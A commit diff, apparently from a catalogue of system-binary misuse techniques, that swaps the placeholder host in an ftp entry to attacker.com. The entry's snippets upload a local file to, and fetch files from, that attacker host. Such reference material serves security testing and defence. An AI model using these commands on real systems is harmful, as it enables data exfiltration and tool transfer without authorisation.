Use target.com and attacker.com

This commit is contained in:
Emilio Pinna
2018-05-24 20:59:21 +01:00
parent 4bea8d51cc
commit b857c98f92
19 changed files with 58 additions and 58 deletions

View File

@@ -11,13 +11,13 @@ functions:
upload:
- description: Send local file to a FTP server.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
ftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
ftp $RHOST
get file_to_get
---